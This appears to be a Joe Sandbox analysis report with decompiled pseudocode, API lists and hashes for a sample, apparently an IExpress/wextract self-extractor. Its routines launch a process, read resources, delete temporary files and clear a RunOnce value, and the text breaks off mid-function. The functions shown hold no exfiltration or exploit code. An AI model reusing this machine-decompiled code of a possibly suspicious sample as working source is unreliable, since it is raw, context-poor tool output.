                                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$TMP4351$.TMP
                                                                                                                                                                                                                                            • API String ID: 747627703-3033780695
                                                                                                                                                                                                                                            • Opcode ID: f5481873921c4a6dcbcee830fedfe606553fffa4a42716144c6f794c776e9624
                                                                                                                                                                                                                                            • Instruction ID: f97bcd9ace9d219eb2c2aaa907abda2e741ba1998c9a08e56c08ee3081b155df
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f5481873921c4a6dcbcee830fedfe606553fffa4a42716144c6f794c776e9624
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0711E271B0021CABC7249FB9BC4DA9B7E9DEF4A3A0F104615B60AD31D1CA7098178AA0
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 675 a03fef-a04010 676 a04016-a0403b CreateProcessA 675->676 677 a0410a-a0411a call a06ce0 675->677 678 a04041-a0406e WaitForSingleObject GetExitCodeProcess 676->678 679 a040c4-a04101 call a06285 GetLastError FormatMessageA call a044b9 676->679 682 a04070-a04077 678->682 683 a04091 call a0411b 678->683 691 a04106 679->691 682->683 686 a04079-a0407b 682->686 690 a04096-a040b8 CloseHandle * 2 683->690 686->683 689 a0407d-a04089 686->689 689->683 692 a0408b 689->692 693 a04108 690->693 694 a040ba-a040c0 690->694 691->693 692->683 693->677 694->693 695 a040c2 694->695 695->691
                                                                                                                                                                                                                                            C-Code - Quality: 84%
                                                                                                                                                                                                                                            			E00A03FEF(CHAR* __ecx, struct _STARTUPINFOA* __edx) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v524;
                                                                                                                                                                                                                                            				long _v528;
                                                                                                                                                                                                                                            				struct _PROCESS_INFORMATION _v544;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t20;
                                                                                                                                                                                                                                            				void* _t22;
                                                                                                                                                                                                                                            				int _t25;
                                                                                                                                                                                                                                            				intOrPtr* _t39;
                                                                                                                                                                                                                                            				signed int _t44;
                                                                                                                                                                                                                                            				void* _t49;
                                                                                                                                                                                                                                            				signed int _t50;
                                                                                                                                                                                                                                            				intOrPtr _t53;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t45 = __edx;
                                                                                                                                                                                                                                            				_t20 =  *0xa08004; // 0xe10713fe
                                                                                                                                                                                                                                            				_v8 = _t20 ^ _t50;
                                                                                                                                                                                                                                            				_t39 = __ecx;
                                                                                                                                                                                                                                            				_t49 = 1;
                                                                                                                                                                                                                                            				_t22 = 0;
                                                                                                                                                                                                                                            				if(__ecx == 0) {
                                                                                                                                                                                                                                            					L13:
                                                                                                                                                                                                                                            					return E00A06CE0(_t22, _t39, _v8 ^ _t50, _t45, 0, _t49);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				asm("stosd");
                                                                                                                                                                                                                                            				asm("stosd");
                                                                                                                                                                                                                                            				asm("stosd");
                                                                                                                                                                                                                                            				asm("stosd");
                                                                                                                                                                                                                                            				_t25 = CreateProcessA(0, __ecx, 0, 0, 0, 0x20, 0, 0, __edx,  &_v544); // executed
                                                                                                                                                                                                                                            				if(_t25 == 0) {
                                                                                                                                                                                                                                            					 *0xa09124 = E00A06285();
                                                                                                                                                                                                                                            					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v524, 0x200, 0); // executed
                                                                                                                                                                                                                                            					_t45 = 0x4c4;
                                                                                                                                                                                                                                            					E00A044B9(0, 0x4c4, _t39,  &_v524, 0x10, 0); // executed
                                                                                                                                                                                                                                            					L11:
                                                                                                                                                                                                                                            					_t49 = 0;
                                                                                                                                                                                                                                            					L12:
                                                                                                                                                                                                                                            					_t22 = _t49;
                                                                                                                                                                                                                                            					goto L13;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				WaitForSingleObject(_v544.hProcess, 0xffffffff);
                                                                                                                                                                                                                                            				_t34 = GetExitCodeProcess(_v544.hProcess,  &_v528); // executed
                                                                                                                                                                                                                                            				_t44 = _v528;
                                                                                                                                                                                                                                            				_t53 =  *0xa08a28; // 0x0
                                                                                                                                                                                                                                            				if(_t53 == 0) {
                                                                                                                                                                                                                                            					_t34 =  *0xa09a2c; // 0x0
                                                                                                                                                                                                                                            					if((_t34 & 0x00000001) != 0 && (_t34 & 0x00000002) == 0) {
                                                                                                                                                                                                                                            						_t34 = _t44 & 0xff000000;
                                                                                                                                                                                                                                            						if((_t44 & 0xff000000) == 0xaa000000) {
                                                                                                                                                                                                                                            							 *0xa09a2c = _t44;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				E00A0411B(_t34, _t44);
                                                                                                                                                                                                                                            				CloseHandle(_v544.hThread);
                                                                                                                                                                                                                                            				CloseHandle(_v544);
                                                                                                                                                                                                                                            				if(( *0xa09a34 & 0x00000400) == 0 || _v528 >= 0) {
                                                                                                                                                                                                                                            					goto L12;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					goto L11;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            			}


















                                                                                                                                                                                                                                            0x00a03fef
                                                                                                                                                                                                                                            0x00a03ffa
                                                                                                                                                                                                                                            0x00a04001
                                                                                                                                                                                                                                            0x00a04008
                                                                                                                                                                                                                                            0x00a0400a
                                                                                                                                                                                                                                            0x00a0400b
                                                                                                                                                                                                                                            0x00a04010
                                                                                                                                                                                                                                            0x00a0410a
                                                                                                                                                                                                                                            0x00a0411a
                                                                                                                                                                                                                                            0x00a0411a
                                                                                                                                                                                                                                            0x00a0401c
                                                                                                                                                                                                                                            0x00a0401d
                                                                                                                                                                                                                                            0x00a0401e
                                                                                                                                                                                                                                            0x00a0401f
                                                                                                                                                                                                                                            0x00a04033
                                                                                                                                                                                                                                            0x00a0403b
                                                                                                                                                                                                                                            0x00a040ca
                                                                                                                                                                                                                                            0x00a040e9
                                                                                                                                                                                                                                            0x00a040f8
                                                                                                                                                                                                                                            0x00a04101
                                                                                                                                                                                                                                            0x00a04106
                                                                                                                                                                                                                                            0x00a04106
                                                                                                                                                                                                                                            0x00a04108
                                                                                                                                                                                                                                            0x00a04108
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a04108
                                                                                                                                                                                                                                            0x00a04049
                                                                                                                                                                                                                                            0x00a0405c
                                                                                                                                                                                                                                            0x00a04062
                                                                                                                                                                                                                                            0x00a04068
                                                                                                                                                                                                                                            0x00a0406e
                                                                                                                                                                                                                                            0x00a04070
                                                                                                                                                                                                                                            0x00a04077
                                                                                                                                                                                                                                            0x00a0407f
                                                                                                                                                                                                                                            0x00a04089
                                                                                                                                                                                                                                            0x00a0408b
                                                                                                                                                                                                                                            0x00a0408b
                                                                                                                                                                                                                                            0x00a04089
                                                                                                                                                                                                                                            0x00a04077
                                                                                                                                                                                                                                            0x00a04091
                                                                                                                                                                                                                                            0x00a0409c
                                                                                                                                                                                                                                            0x00a040a8
                                                                                                                                                                                                                                            0x00a040b8
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a040c2
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a040c2

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CreateProcessA.KERNELBASE ref: 00A04033
                                                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00A04049
                                                                                                                                                                                                                                            • GetExitCodeProcess.KERNELBASE ref: 00A0405C
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00A0409C
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00A040A8
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 00A040DC
                                                                                                                                                                                                                                            • FormatMessageA.KERNELBASE(00001000,00000000,00000000), ref: 00A040E9
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.419124794.0000000000A01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419111346.0000000000A00000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419141222.0000000000A08000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_a00000_fxV11fe.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CloseHandleProcess$CodeCreateErrorExitFormatLastMessageObjectSingleWait
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3183975587-0
                                                                                                                                                                                                                                            • Opcode ID: d18436ec462799c232066516eb6d29365c5e77ce096284dba0e8cab27f28288e
                                                                                                                                                                                                                                            • Instruction ID: 01161ecb692b6bde997b92d8d7ce9483eb8de8de28e049ad8ec9b05e4a14f65e
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d18436ec462799c232066516eb6d29365c5e77ce096284dba0e8cab27f28288e
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C431A27164031CABEB20DFA5EC49FAB777CEB98710F1042A9F645E21A1C6744D87CB51
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E00A051E5(void* __eflags) {
                                                                                                                                                                                                                                            				int _t5;
                                                                                                                                                                                                                                            				void* _t6;
                                                                                                                                                                                                                                            				void* _t28;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t1 = E00A0468F("UPROMPT", 0, 0) + 1; // 0x1
                                                                                                                                                                                                                                            				_t28 = LocalAlloc(0x40, _t1);
                                                                                                                                                                                                                                            				if(_t28 != 0) {
                                                                                                                                                                                                                                            					if(E00A0468F("UPROMPT", _t28, _t29) != 0) {
                                                                                                                                                                                                                                            						_t5 = lstrcmpA(_t28, "<None>"); // executed
                                                                                                                                                                                                                                            						if(_t5 != 0) {
                                                                                                                                                                                                                                            							_t6 = E00A044B9(0, 0x3e9, _t28, 0, 0x20, 4);
                                                                                                                                                                                                                                            							LocalFree(_t28);
                                                                                                                                                                                                                                            							if(_t6 != 6) {
                                                                                                                                                                                                                                            								 *0xa09124 = 0x800704c7;
                                                                                                                                                                                                                                            								L10:
                                                                                                                                                                                                                                            								return 0;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							 *0xa09124 = 0;
                                                                                                                                                                                                                                            							L6:
                                                                                                                                                                                                                                            							return 1;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						LocalFree(_t28);
                                                                                                                                                                                                                                            						goto L6;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					E00A044B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            					LocalFree(_t28);
                                                                                                                                                                                                                                            					 *0xa09124 = 0x80070714;
                                                                                                                                                                                                                                            					goto L10;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				E00A044B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            				 *0xa09124 = E00A06285();
                                                                                                                                                                                                                                            				goto L10;
                                                                                                                                                                                                                                            			}






                                                                                                                                                                                                                                            0x00a051fb
                                                                                                                                                                                                                                            0x00a05207
                                                                                                                                                                                                                                            0x00a0520b
                                                                                                                                                                                                                                            0x00a0523c
                                                                                                                                                                                                                                            0x00a05268
                                                                                                                                                                                                                                            0x00a05270
                                                                                                                                                                                                                                            0x00a0528b
                                                                                                                                                                                                                                            0x00a05293
                                                                                                                                                                                                                                            0x00a0529c
                                                                                                                                                                                                                                            0x00a052a6
                                                                                                                                                                                                                                            0x00a052b0
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a052b0
                                                                                                                                                                                                                                            0x00a0529e
                                                                                                                                                                                                                                            0x00a05279
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a0527b
                                                                                                                                                                                                                                            0x00a05273
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a05273
                                                                                                                                                                                                                                            0x00a0524a
                                                                                                                                                                                                                                            0x00a05250
                                                                                                                                                                                                                                            0x00a05256
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a05256
                                                                                                                                                                                                                                            0x00a05219
                                                                                                                                                                                                                                            0x00a05223
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 00A0468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A046A0
                                                                                                                                                                                                                                              • Part of subcall function 00A0468F: SizeofResource.KERNEL32(00000000,00000000,?,00A02D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A046A9
                                                                                                                                                                                                                                              • Part of subcall function 00A0468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A046C3
                                                                                                                                                                                                                                              • Part of subcall function 00A0468F: LoadResource.KERNEL32(00000000,00000000,?,00A02D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A046CC
                                                                                                                                                                                                                                              • Part of subcall function 00A0468F: LockResource.KERNEL32(00000000,?,00A02D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A046D3
                                                                                                                                                                                                                                              • Part of subcall function 00A0468F: memcpy_s.MSVCRT ref: 00A046E5
                                                                                                                                                                                                                                              • Part of subcall function 00A0468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00A046EF
                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00A02F4D,?,00000002,00000000), ref: 00A05201
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00A05250
                                                                                                                                                                                                                                              • Part of subcall function 00A044B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A04518
                                                                                                                                                                                                                                              • Part of subcall function 00A044B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00A04554
                                                                                                                                                                                                                                              • Part of subcall function 00A06285: GetLastError.KERNEL32(00A05BBC), ref: 00A06285
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.419124794.0000000000A01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419111346.0000000000A00000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419141222.0000000000A08000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_a00000_fxV11fe.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Resource$FindFreeLoadLocal$AllocErrorLastLockMessageSizeofStringmemcpy_s
                                                                                                                                                                                                                                            • String ID: <None>$UPROMPT
                                                                                                                                                                                                                                            • API String ID: 957408736-2980973527
                                                                                                                                                                                                                                            • Opcode ID: cd691d894a29ff3a01fb0b2c8dc3ab19155ca951d9fdccefaec1b7b91c034d44
                                                                                                                                                                                                                                            • Instruction ID: 755de98917e52746b5729ef090ba46088e78ed286e8f94ab179cfbc1019f21f5
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cd691d894a29ff3a01fb0b2c8dc3ab19155ca951d9fdccefaec1b7b91c034d44
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CF11E2F1B0060DABE364ABB17D89BBB61ADEF9C380F104429B702D61D0DAB98C034525
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 74%
                                                                                                                                                                                                                                            			E00A052B6(void* __ebx, char* __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				signed int _t9;
                                                                                                                                                                                                                                            				signed int _t11;
                                                                                                                                                                                                                                            				void* _t21;
                                                                                                                                                                                                                                            				void* _t29;
                                                                                                                                                                                                                                            				CHAR** _t31;
                                                                                                                                                                                                                                            				void* _t32;
                                                                                                                                                                                                                                            				signed int _t33;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t28 = __edi;
                                                                                                                                                                                                                                            				_t22 = __ecx;
                                                                                                                                                                                                                                            				_t21 = __ebx;
                                                                                                                                                                                                                                            				_t9 =  *0xa08004; // 0xe10713fe
                                                                                                                                                                                                                                            				_v8 = _t9 ^ _t33;
                                                                                                                                                                                                                                            				_push(__esi);
                                                                                                                                                                                                                                            				_t31 =  *0xa091e0; // 0x34e8ed0
                                                                                                                                                                                                                                            				if(_t31 != 0) {
                                                                                                                                                                                                                                            					_push(__edi);
                                                                                                                                                                                                                                            					do {
                                                                                                                                                                                                                                            						_t29 = _t31;
                                                                                                                                                                                                                                            						if( *0xa08a24 == 0 &&  *0xa09a30 == 0) {
                                                                                                                                                                                                                                            							SetFileAttributesA( *_t31, 0x80); // executed
                                                                                                                                                                                                                                            							DeleteFileA( *_t31); // executed
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t31 = _t31[1];
                                                                                                                                                                                                                                            						LocalFree( *_t29);
                                                                                                                                                                                                                                            						LocalFree(_t29);
                                                                                                                                                                                                                                            					} while (_t31 != 0);
                                                                                                                                                                                                                                            					_pop(_t28);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t11 =  *0xa08a20; // 0x0
                                                                                                                                                                                                                                            				_pop(_t32);
                                                                                                                                                                                                                                            				if(_t11 != 0 &&  *0xa08a24 == 0 &&  *0xa09a30 == 0) {
                                                                                                                                                                                                                                            					_push(_t22);
                                                                                                                                                                                                                                            					E00A01781( &_v268, 0x104, _t22, "C:\Users\jones\AppData\Local\Temp\IXP001.TMP\");
                                                                                                                                                                                                                                            					if(( *0xa09a34 & 0x00000020) != 0) {
                                                                                                                                                                                                                                            						E00A065E8( &_v268);
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					SetCurrentDirectoryA(".."); // executed
                                                                                                                                                                                                                                            					_t22 =  &_v268;
                                                                                                                                                                                                                                            					E00A02390( &_v268);
                                                                                                                                                                                                                                            					_t11 =  *0xa08a20; // 0x0
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				if( *0xa09a40 != 1 && _t11 != 0) {
                                                                                                                                                                                                                                            					_t11 = E00A01FE1(_t22); // executed
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				 *0xa08a20 =  *0xa08a20 & 0x00000000;
                                                                                                                                                                                                                                            				return E00A06CE0(_t11, _t21, _v8 ^ _t33, 0x104, _t28, _t32);
                                                                                                                                                                                                                                            			}












                                                                                                                                                                                                                                            0x00a052b6
                                                                                                                                                                                                                                            0x00a052b6
                                                                                                                                                                                                                                            0x00a052b6
                                                                                                                                                                                                                                            0x00a052c1
                                                                                                                                                                                                                                            0x00a052c8
                                                                                                                                                                                                                                            0x00a052cb
                                                                                                                                                                                                                                            0x00a052cc
                                                                                                                                                                                                                                            0x00a052d4
                                                                                                                                                                                                                                            0x00a052d6
                                                                                                                                                                                                                                            0x00a052d7
                                                                                                                                                                                                                                            0x00a052de
                                                                                                                                                                                                                                            0x00a052e0
                                                                                                                                                                                                                                            0x00a052f2
                                                                                                                                                                                                                                            0x00a052fa
                                                                                                                                                                                                                                            0x00a052fa
                                                                                                                                                                                                                                            0x00a05302
                                                                                                                                                                                                                                            0x00a05305
                                                                                                                                                                                                                                            0x00a0530c
                                                                                                                                                                                                                                            0x00a05312
                                                                                                                                                                                                                                            0x00a05316
                                                                                                                                                                                                                                            0x00a05316
                                                                                                                                                                                                                                            0x00a05317
                                                                                                                                                                                                                                            0x00a0531c
                                                                                                                                                                                                                                            0x00a0531f
                                                                                                                                                                                                                                            0x00a05333
                                                                                                                                                                                                                                            0x00a05345
                                                                                                                                                                                                                                            0x00a05351
                                                                                                                                                                                                                                            0x00a05359
                                                                                                                                                                                                                                            0x00a05359
                                                                                                                                                                                                                                            0x00a05363
                                                                                                                                                                                                                                            0x00a05369
                                                                                                                                                                                                                                            0x00a0536f
                                                                                                                                                                                                                                            0x00a05374
                                                                                                                                                                                                                                            0x00a05374
                                                                                                                                                                                                                                            0x00a05381
                                                                                                                                                                                                                                            0x00a05387
                                                                                                                                                                                                                                            0x00a05387
                                                                                                                                                                                                                                            0x00a0538f
                                                                                                                                                                                                                                            0x00a053a0

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • SetFileAttributesA.KERNELBASE(034E8ED0,00000080,?,00000000), ref: 00A052F2
                                                                                                                                                                                                                                            • DeleteFileA.KERNELBASE(034E8ED0), ref: 00A052FA
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(034E8ED0,?,00000000), ref: 00A05305
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(034E8ED0), ref: 00A0530C
                                                                                                                                                                                                                                            • SetCurrentDirectoryA.KERNELBASE(00A011FC,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 00A05363
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            • C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 00A05334
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.419124794.0000000000A01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419111346.0000000000A00000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419141222.0000000000A08000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_a00000_fxV11fe.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: FileFreeLocal$AttributesCurrentDeleteDirectory
                                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\
                                                                                                                                                                                                                                            • API String ID: 2833751637-3647970563
                                                                                                                                                                                                                                            • Opcode ID: 9f129546ea0d565a6968989f87f16673c8945f1e168a70226203f63b8218f50b
                                                                                                                                                                                                                                            • Instruction ID: 5db2a3160891560da90f52bfdaf0ccd2d1e4ac922a68fa522131573a4a1adfdd
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9f129546ea0d565a6968989f87f16673c8945f1e168a70226203f63b8218f50b
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DF21CF31A0060CDBDB34DFA4FD29B6A37A4BB14380F040119E4825A5E1CBB45C87CF86
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E00A01FE1(void* __ecx) {
                                                                                                                                                                                                                                            				void* _v8;
                                                                                                                                                                                                                                            				long _t4;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				if( *0xa08530 != 0) {
                                                                                                                                                                                                                                            					_t4 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x20006,  &_v8); // executed
                                                                                                                                                                                                                                            					if(_t4 == 0) {
                                                                                                                                                                                                                                            						RegDeleteValueA(_v8, "wextract_cleanup1"); // executed
                                                                                                                                                                                                                                            						return RegCloseKey(_v8);
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return _t4;
                                                                                                                                                                                                                                            			}





                                                                                                                                                                                                                                            0x00a01fee
                                                                                                                                                                                                                                            0x00a02005
                                                                                                                                                                                                                                            0x00a0200d
                                                                                                                                                                                                                                            0x00a02017
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a02020
                                                                                                                                                                                                                                            0x00a0200d
                                                                                                                                                                                                                                            0x00a02029

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00020006,00A0538C,?,?,00A0538C), ref: 00A02005
                                                                                                                                                                                                                                            • RegDeleteValueA.KERNELBASE(00A0538C,wextract_cleanup1,?,?,00A0538C), ref: 00A02017
                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00A0538C,?,?,00A0538C), ref: 00A02020
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.419124794.0000000000A01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419111346.0000000000A00000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419141222.0000000000A08000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_a00000_fxV11fe.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CloseDeleteOpenValue
                                                                                                                                                                                                                                            • String ID: Software\Microsoft\Windows\CurrentVersion\RunOnce$wextract_cleanup1
                                                                                                                                                                                                                                            • API String ID: 849931509-1592051331
                                                                                                                                                                                                                                            • Opcode ID: cbf6af84ebb7282f31187c318c50327684f9a9b6aae31e5e59a2fe7cee857473
                                                                                                                                                                                                                                            • Instruction ID: d34927b9608cc98cbbfca24d866b875f840aeadf62ae4689dff50fa791d36dcc
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cbf6af84ebb7282f31187c318c50327684f9a9b6aae31e5e59a2fe7cee857473
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 28E01A31A5031CBBD7218FD0BC4AF597A2DF710741F100194BA05A00E0EB666E16D609
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 94%
                                                                                                                                                                                                                                            			E00A04CD0(char* __edx, long _a4, int _a8) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t29;
                                                                                                                                                                                                                                            				int _t30;
                                                                                                                                                                                                                                            				long _t32;
                                                                                                                                                                                                                                            				signed int _t33;
                                                                                                                                                                                                                                            				long _t35;
                                                                                                                                                                                                                                            				long _t36;
                                                                                                                                                                                                                                            				struct HWND__* _t37;
                                                                                                                                                                                                                                            				long _t38;
                                                                                                                                                                                                                                            				long _t39;
                                                                                                                                                                                                                                            				long _t41;
                                                                                                                                                                                                                                            				long _t44;
                                                                                                                                                                                                                                            				long _t45;
                                                                                                                                                                                                                                            				long _t46;
                                                                                                                                                                                                                                            				signed int _t50;
                                                                                                                                                                                                                                            				long _t51;
                                                                                                                                                                                                                                            				char* _t58;
                                                                                                                                                                                                                                            				long _t59;
                                                                                                                                                                                                                                            				char* _t63;
                                                                                                                                                                                                                                            				long _t64;
                                                                                                                                                                                                                                            				CHAR* _t71;
                                                                                                                                                                                                                                            				CHAR* _t74;
                                                                                                                                                                                                                                            				int _t75;
                                                                                                                                                                                                                                            				signed int _t76;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t69 = __edx;
                                                                                                                                                                                                                                            				_t29 =  *0xa08004; // 0xe10713fe
                                                                                                                                                                                                                                            				_t30 = _t29 ^ _t76;
                                                                                                                                                                                                                                            				_v8 = _t30;
                                                                                                                                                                                                                                            				_t75 = _a8;
